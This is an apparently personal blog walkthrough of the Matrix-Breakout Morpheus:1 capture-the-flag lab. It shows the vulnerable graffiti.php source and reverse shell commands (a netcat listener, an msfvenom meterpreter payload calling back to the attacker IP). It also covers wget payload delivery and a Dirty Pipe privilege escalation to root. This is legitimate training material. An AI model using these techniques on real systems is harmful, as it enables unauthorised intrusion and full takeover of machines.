Matrix 2 Morpheus Walkthrough


This is the second in the Matrix-Breakout series, subtitled Morpheus:1. It’s themed as a throwback to the first Matrix movie. You play Trinity, trying to investigate a computer on the Nebuchadnezzar that Cypher has locked everyone else out from, which holds the key to a mystery.
Difficulty: Medium-Hard
Phase 1: Reconnaissance
Getting the IP Address of the Target machine I used Netdiscover tool and got the ip address → 192.168.161.131
Phase 2: Network Scanning
Here port 80 http is open, lets open it in browser and see what it shows
Following is the webpage that is present on target machine, and nothing interesting in source and nothing in cookies and localstorge
Now I will use Gobuster to get the endpoints/dirs for this webapp that are hidden
gobuster dir -u http://192.168.161.131/ -w /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt -x .php,.txt,.html
So I got the following results:
robots.txt
/graffiti.txt
/graffiti.php
Lets visit robots.txt,
Got this LOL -> There's no white rabbit here. Keep searching!
-> Let try graffiti.txt
It is just a text file nothing special
Lets try graffiti.php here we got a web page with a input box and also we can do xss attact from this
Now let's analyse this request in Burpsuite to get the path for the file here's the data variables that are taking data
Now when I try changing the file extension to see whether new file is getting saved or not, it is saved and message is written into the file and file gets stored on the server, now let’s try to get the source code for the graffiti.php file to know the backend working
Here I got the source code for the graffiti.php
$file="graffiti.txt";
if($_SERVER['REQUEST_METHOD'] == 'POST') {
if (isset($_POST['file'])) {
$file=$_POST['file'];
}
if (isset($_POST['message'])) {
$handle = fopen($file, 'a+') or die('Cannot open file: ' . $file);
fwrite($handle, $_POST['message']);
fwrite($handle, "\n");
fclose($file);
}
}
// Display file
$handle = fopen($file,"r");
while (!feof($handle)) {
echo fgets($handle);
echo "
\n";
}
fclose($handle);
?>
Here it is just getting the message from the input box and writing its value in the graffiti.txt file.
Now I will try to upload a php reverse shell File
The file got uploaded successfully, now lets try to get the reverse shell, here I am using netcat to get the connection from the target machine to my kali machine
nc -nlvp 4545
Now I have reverse shell and I got the access of the user www-data
Phase 3: Exploitation
We got our first flag in FLAG.txt, and also hints for the user cypher lets see we get its password
I don’t have access to /etc/shadow nor /etc/passwd, lets use metasploit to get the exploits that can be used to exploit this machine
For this I am generating a backdoor using msfvenom and uploading it /tmp of target machine
msfvenom -p linux/x86/meterpreter_reverse_tcp LHOST=192.168.161.128 LPORT=6565 -f elf -o escalate.elf
I used wget to get the file from my kali to the target machine and then got the meterpreter session in metasploit
Now I have make that session to run in background, and now I will use search suggester to do a exploit scan
So the target machine is vulneable to exploit/linux/local/cve_2022_0847_dirtypipe
Now I search for it and got the following https://github.com/AlexisAhmed/CVE-2022-0847-DirtyPipe-Exploits
Now lets try using this to exploit the target machine
I got the three files and now I have given execute permission to all of them and now lets execute them
Finally got the root shell access 🎉🎉
Here I got the final Flag…. 🔴🔴
Subscribe to my newsletter
Read articles from Furkan Sayyed directly inside your inbox. Subscribe to the newsletter, and don't miss out.
Written by
